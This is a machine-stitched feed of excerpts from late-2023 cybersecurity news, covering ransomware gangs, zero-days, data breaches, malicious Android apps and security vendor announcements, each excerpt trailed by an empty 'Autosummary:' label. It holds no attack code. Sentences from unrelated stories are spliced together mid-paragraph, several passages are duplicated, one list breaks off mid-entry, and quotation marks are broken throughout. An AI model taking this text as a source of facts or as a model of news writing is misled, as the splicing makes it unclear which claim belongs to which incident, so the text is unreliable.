Scattered Spider, also known as 0ktapus, Starfraud, UNC3944, and Muddled Libra, is adept at social engineering and relies on phishing, multi-factor authentication (MFA) bombing (targeted MFA fatigue), and SIM swapping to gain initial network access on large organizations. Just hours after the attack, victims began reporting in the BleepingComputer"s forum that files with vmxf, .vmx, .vmdk, .vmsd, and .nvram, all files associated with VMware ESXi virtual machines, were encrypted. MGM Resorts International suffered a massive attack that impacted numerous systems, including its main website, online reservations, and in-casino services, like ATMs, slot machines, and credit card machines.2023 was a big year for cybersecurity, with significant cyberattacks, data breaches, new threat groups emerging, and, of course, zero-day vulnerabilities. "Since we neither can nor wish to meet the financial demands of the criminal hackers for a ransom, CloudNordic"s IT team and external experts have been working intensively to assess the damage and determine what could be recovered," reads CloudNordic"s statement (machine translated) "Sadly, it has been impossible to recover more data, and the majority of our customers have consequently lost all their data with us. MOVEit Transfer is a managed file transfer (MFT) solution developed by Ipswitch, a subsidiary of US-based Progress Software Corporation, that allows the enterprise to securely transfer files between business partners and customers using SFTP, SCP, and HTTP-based uploads. "Autosummary:
"These threats are unique in their approach, targeting a wide range of blockchain networks, from Ethereum and Binance Smart Chain to Polygon, Avalanche, and almost 20 other networks by using a crypto wallet-draining technique," Check Point researchers Oded Vanunu, Dikla Barda, and Roman Zaikin said. "Autosummary:
"So the ransomware destroyed the MBR or GPT partition table, but tools such as "testdisk" can often recover or re-generate those." For files that do not contain large zero-byte chunks of data, SRLabs says it may still be possible to recover files if you have an older unencrypted version with similar data. Black Basta encrypted file showing the encryption key Source: BleepingComputer While decrypting smaller files may not be possible, larger files like virtual machine disks can usually be decrypted, as they contain a large number of "zero-byte" sections. "Autosummary:
"Autosummary:
Join Now At least four different financially motivated hacking groups have been observed taking advantage of the App Installer service since mid-November 2023, using it as an entry point for follow-on human-operated ransomware activity - Storm-0569, an initial access broker which propagates BATLOADER through search engine optimization (SEO) poisoning with sites spoofing Zoom, Tableau, TeamViewer, and AnyDesk, and uses the malware to deliver Cobalt Strike and handoff the access to Storm-0506 for Black Basta ransomware deployment. "Autosummary:
On September 14, Caesar’s Entertainment reported in a filing with the US Securities and Exchange Commission that it, too, had suffered a cyber breach, and according to reporting from CNBC, it received a $30 million ransom demand, which it then negotiated down by about 50 percent.The Royal Mail rep is direct, says they work in IT, and, curiously, has a deft command of flattery, referring to LockBit’s work as “pen-testing.” MGM Resorts International later provided a sober estimation of the cost of the recovery effort, expecting a $100 million loss to its third-quarter results, and valid criticism about the hotelier’s security vulnerabilities remain, but in the land of vice and greed, stopping a ransomware gang is a feat that few have accomplished. “It has come to our attention that MeridianLink, in light of a significant breach compromising customer data and operational information, has failed to file the requisite disclosure under Item 1.05 of Form 8-K within the stipulated four business days, as mandated by the new SEC rules,” ALPHV allegedly wrote in their complaint to the SEC. Within days of Royal Mail’s announcement, news outlets began linking the alleged cyber incident to the ransomware gang LockBit, which, oddly, denied the attack. "Autosummary:
"Autosummary:
Using token:GAIA pairs read from a text file to generate requests to MultiLogin Source: CloudSEK In a discussion with CloudSek researcher Pavan Karthick, BleepingComputer was told they reverse-engineered the exploit and were able to use it to regenerate expired Google authentication cookies, as shown below. "Autosummary:
"Autosummary:
The Computer Emergency Response Team of Ukraine (CERT-UA) warned of a new cyber espionage campaign carried out by the Russia-linked group APT28 (aka “Forest Blizzard”, “Fancybear” or “Strontium”). "Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @serghei, @demonslay335, @BleepinComputer, @Ionut_Ilascu, @Seifreed, @fwosar, @LawrenceAbrams, @billtoulas, @MsftSecIntel, @DarkWebInformer, @BrettCallow, @pcrisk, and @Fortinet. December 29th, 2023 Two not-for-profit hospitals in New York are seeking a court order to retrieve data stolen in an August ransomware attack that"s now stored on the servers of a Boston cloud storage company. "Autosummary:
Cyber attacks hit the Assembly of the Republic of Albania and telecom company One Albania Pierluigi Paganini December 29, 2023 December 29, 2023 Cyber attacks hit the Assembly of the Republic of Albania and telecom company One Albania, a government agency reported. “Yesterday, on December 25, AKCESK was notified of cyber attacks that occurred on the ONE telephone company and the Assembly of the Republic of Albania.” reads the announcement published by AKCESK. "As healthcare organizations increasingly rely on interconnected systems, electronic health records, and telemedicine, the industry becomes a prime target for malicious actors seeking to exploit vulnerabilities. The consequences of a cybersecurity breach in healthcare are not only measured in compromised data but also in jeopardized patient safety and trust. In this article, you will find excerpts from cybersecurity-focused surveys conducted in the healthcare sector we covered in 2023. By utilizing this data, your security team … More
The post Unveiling the true cost of healthcare cybersecurity incidents appeared first on Help Net Security.
"Autosummary:
"In 2023, cyberattacks surged both in terms of frequency and sophistication. The proliferation of cutting-edge hacking tools and technologies – now more accessible than ever thanks to advances in generative AI – created an environment conducive for cyber threats to flourish, forcing organizations to adopt proactive measures to keep their digital assets secure. Heading into 2024, the attack surface is set to expand even further, with threats likely to grow more and more elusive. Considering … More
The post 5 pivotal cybersecurity trends for 2024 appeared first on Help Net Security.
"Autosummary:
Deepfakes and multi-modal ML models: The evolution of deception Staying in the AI realm, multi-modal machine learning models have granted attackers the capacity to generate convincing audio, images, and videos to trick unsuspecting employees. Just this past summer, threat actors used a malicious open-source program known as TeamsPhisher to send phishing lures to unsuspecting users via Microsoft Teams to perpetrate subsequent cyber-strikes, including ransomware attacks. "Autosummary:
"Autosummary:
But in 2023, that changed, when Swift began her “Eras” tour, a globe-spanning celebration of her past albums that, on stage, delighted audiences for three-and-a-half hours every night, no matter the weather. The “logout king” gets pinned In March, the reporting outlet ProPublica revealed that, after months of investigation, it had likely tracked down one of the most notorious online scammers—the self-proclaimed “log-out king,” also known as OBN Brandon. With every visit to a compromised website, a user is surreptitiously “fingerprinted”—if their IP address, computer environment, and cyber-defenses (or lack thereof) are all preferable to the hackers behind Wooflocker, then those website visitors are redirected to another domain with a URL that is created then and there by Wooflocker’s hacking scripts. Sprung just before Black Friday, this scam had it all—the urgency of an annual mega-shopping event, the name of a recognized and trusted online retailer, and the allure of a once-benign product now launched into viral celebrity. "Autosummary:
"This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk," the company said in its Threat Report H2 2023. "Autosummary:
"Autosummary:
(Addressed in iOS 16.6) It"s worth noting that patches for CVE-2023-41990 were released by Apple in January 2023, although details about the exploitation were only made public by the company on September 8, 2023, the same day it shipped iOS 16.6.1 to resolve two other flaws (CVE-2023-41061 and CVE-2023-41064) that were actively abused in connection with a Pegasus spyware campaign." "Hardware security very often relies on "security through obscurity," and it is much more difficult to reverse-engineer than software, but this is a flawed approach, because sooner or later, all secrets are revealed. "Autosummary:
"This letter provides important information that can help protect you and your digital assets against misuse of your personal data, including your name, email address, phone number, address, claim number, claim amount, FTX account ID, and/or coin holdings and balances, as well as, for a limited number of individuals, date of birth," the company said in letters sent earlier this month and spotted by Emsisoft threat analyst Brett Callow. "Autosummary:
"Autosummary:
" This patch bypass is caused by flawed logic in handling empty or special parameters like "requirePasswordChange=Y." Vulnerable authentication logic function (SonicWall) SonicWall reported their findings to the Apache team, who quickly resolved the flaw, which they categorized as a server-side request forgery (SSRF) problem. "Autosummary:
Lockbit ransomware attack interrupted medical emergencies gang at a German hospital network Pierluigi Paganini December 28, 2023 December 28, 2023 A Lockbit ransomware attack against the German hospital network Katholische Hospitalvereinigung Ostwestfalen (KHO) caused service disruptions at three hospitals. "Autosummary:
Once installed on a compromised computer, the malware will collect cookies and saved passwords and credit cards from web browsers (Google Chrome, Yandex, Microsoft Edge, Mozilla Firefox, Brave, Vivaldi), as well as Steam and Discord info. "Autosummary:
Eagers Automotive is the largest operator of car dealerships in Australia and New Zealand, with over 300 selling points for brands such as Toyota, BMW, Nissan, Mercedes-Benz, Audi, Ford, VW, and Honda. "Autosummary:
The company"s announcement mentions that some customers have had the following information compromised, depending on what they have provided to the platform: Name Phone number Physical address Email address Some digits of their credit card/debit card or IBAN The above could help cybercriminals launch effective phishing attacks against the exposed EasyPark users, which the company warns explicitly about in the data breach notice. "Autosummary:
"Since mid-November 2023, Microsoft Threat Intelligence has observed threat actors, including financially motivated actors like Storm-0569, Storm-1113, Sangria Tempest, and Storm-1674, utilizing the ms-appinstaller URI scheme (App Installer) to distribute malware," the company said. "Autosummary:
"Autosummary:
Once installed on a compromised computer, the malware will collect cookies and saved passwords and credit cards from web browsers (Google Chrome, Yandex, Microsoft Edge, Mozilla Firefox, Brave, Vivaldi), as well as Steam and Discord info. "The impact of DDoS attacks extends far beyond mere inconvenience, as they can result in financial losses, compromised data, and erosion of customer trust. Understanding the nature and consequences of DDoS activity is essential for organizations and individuals alike as they strive to protect their online presence and ensure the uninterrupted flow of critical services. In this article, you will find excerpts from DDoS attack surveys we covered in 2023. This data will enable your … More
The post Essential DDoS statistics for understanding attack impact appeared first on Help Net Security.
"Autosummary:
Global rise in DDoS attacks threatens digital infrastructure In 2022, the total number of DDoS attacks worldwide increased by 115.1% over the amount observed in 2021, according to Nexusguard. "91% of banks and insurance companies have now initiated their cloud journey, a significant increase from 2020, when only 37% of firms had embarked on their cloud transformations, according to Capgemini. However, this high rate and its corresponding investment does not translate to effective cloud adoption at scale. More than 50% of firms surveyed have only moved a minimal portion of their core business applications to the cloud. 89% of financial services executives believe that … More
The post Data security and cost are key cloud adoption challenges for financial industry appeared first on Help Net Security.
"Autosummary:
Cloud migration priorities include risk and customer relationship management Industry executives surveyed in this report across health insurance, life insurance, capital markets, payments, retail banks and wealth management, identify risk management and customer relationship management (CRM) amongst their top three areas ripe for early cloud adoption. Recently, the Digital Operational Resilience Act (DORA) mandated that financial institutions subject to European Union (EU) regulations must rigorously implement, document, and uphold the requisite systems, protocols, and tools to provide sufficient reliability, capacity, and resilience. "Autosummary:
"Autosummary:
Many anti-malware solutions, including Malwarebytes, have anti-tampering protection in place, so finding methods to disable the protection is a big deal for malware authors.With valid credentials gained by the vulnerability exploitation, phishing, or password attacks, the criminals get access to an internet exposed service, where they can set up some foothold to provide them with command and control options. "Autosummary:
Some of the apps are listed below - Essential Horoscope for Android (com.anomenforyou.essentialhoroscope) 3D Skin Editor for PE Minecraft (com.littleray.skineditorforpeminecraft) Logo Maker Pro (com.vyblystudio.dotslinkpuzzles) Auto Click Repeater (com.autoclickrepeater.free) Count Easy Calorie Calculator (com.lakhinstudio.counteasycaloriecalculator) Sound Volume Extender (com.muranogames.easyworkoutsathome) LetterLink (com.regaliusgames.llinkgame) NUMEROLOGY: PERSONAL HOROSCOPE &NUMBER PREDICTIONS (com. "Autosummary:
"Autosummary:
In the last couple of years, multiple prominent Australian organizations have been victims of cyberattacks, including Medibank, Energy One, Crown Resorts, Latitude Financial, Nissan Australia, DP World Australia, EnergyAustralia, and Optus. "Autosummary:
" Second wave of zero-day attacks this year In May, the same hacker group used another zero-day (CVE-2023-2868) to target Barracuda ESG appliances as part of a cyber-espionage campaign. "Autosummary:
"Autosummary:
Experts analyzed attacks against poorly managed Linux SSH servers Pierluigi Paganini December 27, 2023 December 27, 2023 Researchers warn of attacks against poorly managed Linux SSH servers that mainly aim at installing DDoS bot and CoinMiner. "Autosummary:
"Autosummary:
"Autosummary:
The most popular of the Xamalicious apps are the following: Essential Horoscope for Android – 100,000 installs – 100,000 installs 3D Skin Editor for PE Minecraft – 100,000 installs – 100,000 installs Logo Maker Pro – 100,000 installs – 100,000 installs Auto Click Repeater – 10,000 installs – 10,000 installs Count Easy Calorie Calculator – 10,000 installs – 10,000 installs Dots: One Line Connector – 10,000 installs – 10,000 installs Sound Volume Extender – 5,000 installs Also, a separate set of 12 malicious apps carrying the Xamalicious threat, for which download stats aren"t available, are distributed on unofficial third-party app stores, infecting users via downloadable APK (Android package) files. "Autosummary:
"Autosummary:
Barracuda fixed a new ESG zero-day exploited by Chinese group UNC4841 Pierluigi Paganini December 27, 2023 December 27, 2023 Security firm Barracuda addressed a new zero-day, affecting its Email Security Gateway (ESG) appliances, that is actively exploited by the China-linked UNC4841 group. “In our ongoing investigation, Barracuda has determined that a threat actor has utilized an Arbitrary Code Execution (ACE) vulnerability within a third party library, Spreadsheet::ParseExcel, to deploy a specially crafted Excel email attachment to target a limited number of ESG devices.”reads the advisory. "Autosummary:
"Autosummary:
Not much is known about the DragonForce ransomware gang, and while they are a new operation, their tactics, negotiation style, and data leak site indicate an experienced extortion group. "Autosummary:
Most of the infections are in the USA, Brazil, Argentina, the UK, Spain, and Germany “Android applications written in non-java code with frameworks such as Flutter, react native and Xamarin can provide an additional layer of obfuscation to malware authors that intentionally pick these tools to avoid detection and try to stay under the radar of security vendors and keep their presence on apps markets.” concludes the report. "Notable security breaches have bypassed MFA to compromise taxi broker Uber, games company EA, and authentication business Okta, according to SE Labs. CISOs must bolster MFA protections SE Labs advised CISOs to step-up their efforts against attacks on systems protected by MFA in response to increased attacker activity to exploit failure points. As is often the case when compromising systems, attackers have not reinvented the wheel to circumvent MFA, or 2FA (two-factor authentication), as it … More
The post 3 main tactics attackers use to bypass MFA appeared first on Help Net Security.
"Autosummary:
“MFA is still one of the best security measures people can use since the password was invented, but as organisations shore up their defences deploying it, so attackers are switching tactics and working hard to find ways around it,” says Simon Edwards, CEO of SE Labs. "The fintech market is undergoing a rapid shift, with the rise of new technologies, such as Open Finance, generative AI and A2A (Account-to-Account) payments having a major impact on business models, according to Juniper Research. This is combined with unprecedented competition to be ‘top of wallet’ for customers, making the market more competitive and uncertain than ever. Economic pressures, an accelerating shift from cards, and the need for differentiation are key drivers that will lead … More
The post Rising fintech trends for 2024: From A2A payments to GenAI in banking appeared first on Help Net Security.
"Autosummary:
The fintech market is undergoing a rapid shift, with the rise of new technologies, such as Open Finance, generative AI and A2A (Account-to-Account) payments having a major impact on business models, according to Juniper Research. "Autosummary:
Repetitive phishing training that neither aligns to how users engage with email, nor provides appropriate tools for responding to ambiguous emails are a waste of time, money, and the patience of the employee. Number 5—The content is badly written and may well include typos—AI phishing emails may still use generic greetings, such as “Dear user” or “Dear customer,” instead of addressing the recipient by name. "Autosummary:
" The company"s data shows that industrials (33%), consumer cyclicals (18%), and healthcare (11%) emerged as the top targeted sectors, with North America (50%), Europe (30%), and Asia (10%) accounting for most of the attacks. "Autosummary:
Carbanak malware returned in ransomware attacks Pierluigi Paganini December 26, 2023 December 26, 2023 Researchers at NCC Group reported that in November they observed the return of the infamous banking malware Carbanak in ransomware attacks. "Autosummary:
Tor dark web site selling personal data of patients Source: BleepingComputer The website contains data added between October 19th and December 24th, 2023, allowing visitors to pay $50 to delete the data record or $3 to view it. "Autosummary:
Apart from its general surgery section, it has specialists in orthopedics and rheumatology, gynecology, urology and endocrinology, neurology, nephrology, pulmonology, internal medicine, oncology, infectious disease, and anesthesiology. “Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. "Autosummary:
"Autosummary:
Also called Clean Ursa, Inception, Oxygen, and Red October, the threat actor is known for its persistent campaigns targeting Russia, Belarus, Azerbaijan, Turkey, and Slovenia. "Autosummary:
Iran-linked APT33 targets Defense Industrial Base sector with FalseFont backdoor Pierluigi Paganini December 25, 2023 December 25, 2023 Microsoft reports that the Iran-linked APT33 group is targeting defense contractors worldwide with FalseFont backdoor. "Autosummary:
In May 2023, CERT-UA warned of cyberespionage attacks carried out by UAC-0099 against state organizations and media representatives of Ukraine Since the CERT-UA publication in May, Deep Instinct has identified new attacks carried out by “UAC-0099” against Ukrainian targets. "Autosummary:
Video game giant Ubisoft investigates reports of a data breach Pierluigi Paganini December 24, 2023 December 24, 2023 Video game publisher Ubisoft is investigating reports of an alleged data breach after popular researchers shared evidence of the hack. "Autosummary:
The customer data exposed in the breach includes: Name Telephone number Email address SIM serial number and IMEI number (a device identifier similar to a serial number) A brief description of service plan purchased Mint says they do not store credit card numbers, so they were not exposed. "Autosummary:
"Autosummary:
Mobile virtual network operator Mint Mobile discloses a data breach Pierluigi Paganini December 23, 2023 December 23, 2023 Mobile virtual network operator Mint Mobile suffered a new data breach, threat actors had access to customers’ personal information. "Autosummary:
LockBit ransomware gang claims to have breached accountancy firm Xeinadin Pierluigi Paganini December 23, 2023 December 23, 2023 The LockBit ransomware claims to have hacked accountancy firm Xeinadin threatens to leak the alleged stolen data. "Generative AI stands at the forefront of technological innovation, reshaping industries and unlocking new possibilities across various domains. However, as the integration of these technologies continues, a vigilant approach to ethical considerations and regulatory compliance is essential to ensure that the benefits of generative AI in cybersecurity are realized responsibly and sustainably. In this article, you will find excerpts from generative AI surveys we covered in 2023. These findings can help with future cybersecurity strategies. … More
The post 11 GenAI cybersecurity surveys you should read appeared first on Help Net Security.
"Autosummary:
Only a fraction of risk leaders are prepared for GenAI threats Companies’ top generative AI concerns include data privacy and cyber issues (65%), employees making decisions based on inaccurate information (60%), employee misuse and ethical risks (55%), and copyright and intellectual property risks (34%). "In this Help Net Security video, William Noto, VP and Industry Principal for Claroty, discusses their recent global survey of 1,100 IT and OT security professionals who work in critical infrastructure sectors. When it comes to ransomware attacks, the impact on OT environments is catching up to the impact on IT environments, according to Claroty. Of the 75% of respondents whose organizations were targeted by ransomware attacks in the past year, 69% paid the ransom, … More
The post New insights into the global industrial cybersecurity landscape appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The attack chains leveraged phishing messages containing HTA, RAR, and LNK file attachments that led to the deployment of LONEPAGE, a Visual Basic Script (VBS) malware that"s capable of contacting a command-and-control (C2) server to retrieve additional payloads such as keyloggers, stealers, and screenshot malware. "Autosummary:
The team discovered that the now-closed database contained details such as: Names Emails Phone numbers Scanned copies of receipts, checks, contracts, and IDs The team believes that malicious actors could employ this type of data for identity theft, phishing attacks, or even commit financial fraud. "Autosummary:
" DarkGate has also been put to use by other threat actors like TA571 and TA577, both of which are known to disseminate a variety of malware, including AsyncRAT, NetSupport, IcedID, PikaBot, and QakBot (aka Qbot). "Autosummary:
"You will find docs with personal information of their employees in the archives and much other interested stuff like NDAs, projects, information about clients and partners etc." Akira surfaced in March 2023 and drew attention after quickly amassing a large number of victims from various industry sectors. "Autosummary:
The variant examined by Cyble is a trojanized version of an open-source GitHub project called "QuranApp: Read and Explore" that comes fitted with a wide range of spyware features to record audio and VoIP calls, capture screenshots, gather data from various apps, download additional APK files, and track the victim"s location. "Autosummary:
"Autosummary:
We also learned this week about new ransomware attacks or information about old ones, including: Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @BleepinComputer, @demonslay335, @Seifreed, @billtoulas, @Ionut_Ilascu, @fwosar, @serghei, @LawrenceAbrams, @BrettCallow, @PRODAFT, @AShukuhi, @uuallan, @SophosXOps, @pcrisk, @3xp0rtblog, @oct0xor, @MorganDemboski, and @juanbrodersen.According to our dataset, Akira has primarily targeted organizations located in Europe, North America, and Australia, and operating in the government, manufacturing, technology, education, consulting, pharmaceuticals, and telecommunication sectors. "Autosummary:
Akira ransomware gang claims the theft of sensitive data from Nissan Australia Pierluigi Paganini December 22, 2023 December 22, 2023 The Akira ransomware group announced it had breached the network of Nissan Australia, the Australian branch of the car maker giant. "Threats over HTTPS grew by 24% from 2022, underscoring the sophisticated nature of cybercriminal tactics that target encrypted channels, according to Zscaler. For the second year in a row, manufacturing was the industry most commonly targeted, with education and government organizations seeing the highest year-over-year increase in attacks. Additionally, malware, which includes malicious web content and malware payloads, continued to dominate over other types of encrypted attacks, with ad spyware sites and cross-site scripting accounting … More
The post 86% of cyberattacks are delivered over encrypted channels appeared first on Help Net Security.
"Autosummary:
In total, 86% of all cyber threats, including malware, ransomware, and phishing attacks, are delivered over encrypted channels. "Autosummary:
"Autosummary:
"The manufacturing industry is embracing digital transformation to fuel efficiency and productivity. However, this evolution is accompanied by profound and growing cybersecurity challenges. In this Help Net Security video, Kory Daniels, CISO at Trustwave, discusses recent comprehensive research highlighting the distinct cybersecurity threats confronting manufacturers. Trustwave SpiderLabs has documented the attack flow utilized by threat groups, exposing their tactics, techniques, and procedures. From email-borne malware to exploiting SMB and DCOM protocols for lateral movement, these … More
The post A closer look at the manufacturing threat landscape appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security video, Rowland Corr, VP & Head of Government Relations at Enea, discusses the implications of burner phones and the crisis of confidence in network operators as they struggle to protect consumers from sophisticated (usually state-sponsored) cyber threats.
The post How executives adapt to rising cybersecurity concerns in mobile networks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" Stealers and trojans notwithstanding, phishing attacks have taken the form of bogus Instagram "Copyright Infringement" emails to steal users" two-factor authentication (2FA) backup codes via fraudulent web pages with an aim to bypass account protections, a scheme called Insta-Phish-A-Gram. "Autosummary:
The main recommendations are: Build security into every stage of software and hardware development and test regularly: Employ a DevSecOps approach Adopt secure by design and secure by default principles during the initial design phase Apply the same principles to cloud environments Conduct application testing or pen testing Protect data across hybrid cloud environments: Gain visibility and control over data in hybrid cloud environments Protect data as it moves between databases, applications and services Utilize data activity monitoring solutions Use security AI and automation to increase speed and accuracy: Embed AI and automation throughout security tool sets to enhance threat detection, response and investigation. Drilling down into industry specifics reveals that the costliest breaches occur in healthcare ($10.93M), financial ($5.9M), pharmaceuticals ($4.82M), energy ($4.78M) and industrial ($4.73M). Strengthen resiliency by knowing your attack surface and practicing incident response: Understand your industry and organization"s exposure to relevant attacks Use ASM tools or adversary simulation techniques for an attacker-informed perspective on risk profile and vulnerabilities Establish a team well-versed in IR protocols and tools Develop IR plans, conduct regular testing, and consider having an IR vendor on retainer for quicker breach response "Autosummary:
"Autosummary:
Earlier versions of Chameleon spotted in April this year impersonated Australian government agencies, banks, and the CoinSpot cryptocurrency exchange, performing keylogging, overlay injection, cookie theft, and SMS theft on compromised devices. "Autosummary:
"Most of the detected phishing pages target users in Germany (17.5%), Poland (13.7%), Spain (12.5%), U.K. (4.2%), Turkey (3.4%) and Singapore (3.1%)." "This sophisticated threat showcases advanced capabilities, particularly in executing man-in-the-browser attacks with its dynamic communication, web injection methods and the ability to adapt based on server instructions and current page state," Langus said. "Autosummary:
"Autosummary:
Phishing attacks use an old Microsoft Office flaw to spread Agent Tesla malware Pierluigi Paganini December 21, 2023 December 21, 2023 Threat actors are exploiting an old Microsoft Office vulnerability, tracked as CVE-2017-11882, to spread the Agent Tesla malware. "Autosummary:
"Autosummary:
Their targets span a wide range of industry sectors across the United States, Saudi Arabia, and South Korea, including government, defense, research, finance, and engineering verticals. "Autosummary:
Title insurance providers under attack Fidelity National Financial, another American title insurance provider, issued a similar disclosure last month, saying that its network was impacted by a "cybersecurity incident. "Autosummary:
The U.S. top countries targeted comprise the U.S. (109 bank apps), the U.K. (48), Italy (44), Australia (34), Turkey (32), France (30), Spain (29), Portugal (27), Germany (23), Canada (17), and Brazil (11). "Autosummary:
Title insurance providers under attack Fidelity National Financial, another American title insurance provider, issued a similar disclosure last month, saying that its network was impacted by a "cybersecurity incident. "Autosummary:
In Nebula, you have a few options for how you want to view found vulnerabilities: Vulnerabilities page On the left navigation menu, go to Monitor > Vulnerabilities to view vulnerabilities across your environment. Based on the scans shared by the VA, ThreatDown Patch Management (PM), patches both the operating system and third-party applications installed on endpoints. "Autosummary:
To demonstrate that fact, it is good to know that CVE-2023-35384 is the second patch bypass for CVE-2023-23397, which was discovered by the same researcher and patched by Microsoft as part of its May 2023 security updates. The second vulnerability, listed as CVE-2023-36710, is a Windows Media Foundation Core Remote Code Execution vulnerability where the word Remote refers to the location of the attacker. "Autosummary:
It supports video, voice, and generic data to be sent between peers, allowing developers to build powerful voice- and video-communication solutions.The zero-day patched in this update is listed as CVE-2023-7024, a heap buffer overflow in Web Real-Time Communications (WebRTC). "Autosummary:
"Bringing artificial intelligence into the cybersecurity field has created a vicious cycle. Cyber professionals now employ AI to enhance their tools and boost their detection and protection capabilities, but cybercriminals are also harnessing AI for their attacks. Security teams then use more AI in response to the AI-driven threats, and threat actors augment their AI to keep up, and the cycle continues. Despite its great potential, AI is significantly limited when employed in cybersecurity. There … More
The post AI’s efficacy is constrained in cybersecurity, but limitless in cybercrime appeared first on Help Net Security.
"Autosummary:
For example, AI-aided SIEM may accurately point out anomalies for security personnel to evaluate; however, an inside threat actor can prevent the proper handling of the security issues spotted by the system, rendering the use of AI in this case practically futile.Using AI to fight cyber threats will always be challenging due to various factors, including the need to establish trust, the caution needed when using data for machine learning training, and the importance of human decision-making.It’s good that humans can dismiss AI judgment or decisions, but this also means that human-targeted threats, like social engineering attacks, remain potent. "In this Help Net Security video, Jay Yaneza, Cybersecurity Architect at VicOne, discusses how, in the first half of the year, cyberattacks on the automotive sector caused losses exceeding $11 billion. These attacks mainly targeted automotive suppliers, not OEMs, showing an increasing trend in supply chain vulnerabilities. Over 90% of the attacks focused on entities other than OEMs.
The post Supply chain emerges as major vector in escalating automotive cyberattacks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
List of dealerships with leaked credentials: BMW Bird Automotive BMW EVM Autokraft BMW Infinity Cars BMW Krishna Automobiles BMW Munich Motors BMW Navnit Motors BMW Speed Motorwagen BMW Titanium Autos BMW Varsha Autohaus BMW Bavaria Motors BMW Eminent Cars BMW Sanghi Classic BMW OSL Prestige BMW Gallops Autohaus BMW Enterprise BMW Apart from being left accessible to the public, the fact that credentials were saved in plain text already shows weak cybersecurity practices. If you want to learn more about how BMW Kun Exclusive can mitigate the risks take a look at the original post at: https://cybernews.com/security/bmw-india-data-leak/ About the author: Paulina Okunytė, Journalist at Cybernews Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, BMW dealer) "Autosummary:
Having managed to gain access to ALPHV"s private control panel, FBI agents were able to gather substantial information about the criminal enterprise"s operations: "From the Campaigns screen, affiliates can see the victim entity, full ransom price demanded, discount ransom price, expiration date, cryptocurrency addresses, cryptocurrency transactions, type of computer system compromised, ransom demand note, chats with the victim, and more," explained the FBI. "Halcyon announced it has closed a $40 million Series B funding round led by Bain Capital Ventures (BCV). The company also announced that BCV Partner and former Symantec CEO, Enrique Salem, will join the Board of Directors, and BCV Partner Jeff Williams will join as Chief Revenue Officer. The oversubscribed funding round follows a $50M Series A announced in April 2023, bringing total funding raised in 2023 to $90M. The new capital will be used … More
The post Halcyon raises $40 million to combat ransomware attacks appeared first on Help Net Security.
"Autosummary:
“The team has deep expertise and experience, and I look forward to joining them as they work to change the impact of ransomware, and ultimately, defeat it.” "SimSpace has closed a $45 million equity raise led by L2 Point Management, a private investment firm specializing in flexible capital solutions for growth companies. This investment brings the total capital raised by SimSpace over the past year to $70 million and will support the company’s continued growth trajectory, including its expansion into new geographies. SimSpace works with the most advanced Fortune 2000 companies, as well as national and state governments, to provide unmatched training … More
The post SimSpace raises $45 million to fuel continued growth appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Recipients who click on the embedded link the message are taken to a bogus, lookalike website ("rpjpapc[.]top") impersonating the UAE Federal Authority for Identity, Citizenship, Customs and Port Security (ICP), which prompts them to enter their personal information such as names, passport numbers, mobile numbers, addresses, and card information. "Autosummary:
"Autosummary:
"Autosummary:
List of dealerships with leaked credentials: BMW Bird Automotive BMW EVM Autokraft BMW Infinity Cars BMW Krishna Automobiles BMW Munich Motors BMW Navnit Motors BMW Speed Motorwagen BMW Titanium Autos BMW Varsha Autohaus BMW Bavaria Motors BMW Eminent Cars BMW Sanghi Classic BMW OSL Prestige BMW Gallops Autohaus BMW Enterprise BMW Apart from being left accessible to the public, the fact that credentials were saved in plain text already shows weak cybersecurity practices. If you want to learn more about how BMW Kun Exclusive can mitigate the risks take a look at the original post at: https://cybernews.com/security/bmw-india-data-leak/ About the author: Paulina Okunytė, Journalist at Cybernews Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, BMW dealer) "Autosummary:
"Autosummary:
"Stellar Cyber unveiled its integration with SentinelOne to help organizations protect their on-premises, cloud, hybrid, and IT/OT environments by making use of the latest advancements in cybersecurity technologies. Together, Stellar Cyber and SentinelOne deliver a security operations solution that automates the identification of advanced threats by correlating threat signals from various data sources, providing security analysts with the contextualized threat information they need to mitigate threats. By combining SentinelOne and Stellar Cyber, customers can be … More
The post Stellar Cyber integrates with SentinelOne for enhanced cybersecurity across environments appeared first on Help Net Security.
"Autosummary:
"ConnectSecure announced it will launch the much-anticipated Version 4.0 of its flagship cybersecurity scanning platform by the end of the year. This release marks a significant leap in the technology, offering efficiency and security management for MSPs globally. Revolutionizing cybersecurity with global GRC view The cornerstone of Version 4.0 is its innovative shift to a global Governance-Risk-and-Compliance (GRC)-centric view. This groundbreaking feature provides MSPs with a comprehensive, real-time overview of all client assets, both networked … More
The post ConnectSecure announces improved cybersecurity scanning platform for MSPs appeared first on Help Net Security.
"Autosummary:
Version 4.0: Packed with new features ConnectSecure’s latest version includes an array of new functionalities designed to streamline MSP operations, such as: Multi-perspective views including global, company, and asset-category Enhanced problem and solution views for driving operational efficiencies Timeline views for detailed asset history, crucial for compliance and audits Fully customizable reports with versatile data export options A robust new Dashboard Engine Significantly improved scalability Advanced bandwidth optimization through smart compression and incremental sync Exclusive, top-tier support entirely based in the US from the Tampa headquarters/li> Strategic pricing for future-ready cybersecurity With the significant new platform functionality, ConnectSecure is revising its pricing tiers for 2024. "The 8220 gang has been leveraging an old Oracle WebLogic Server vulnerability (CVE-2020-14883) to distribute malware, the Imperva Threat Research team has found. About 8220 Active since 2017, the 8220 gang has been known for deploying cryptocurrency miners on Linux and Windows hosts by exploiting known vulnerabilities. “The group relies on simple, publicly available exploits to target well-known vulnerabilities and exploit easy targets to achieve their objectives. While considered unsophisticated, they are constantly evolving their … More
The post 8220 gang exploits old Oracle WebLogic vulnerability to deliver infostealers, cryptominers appeared first on Help Net Security.
"Autosummary:
"Autosummary:
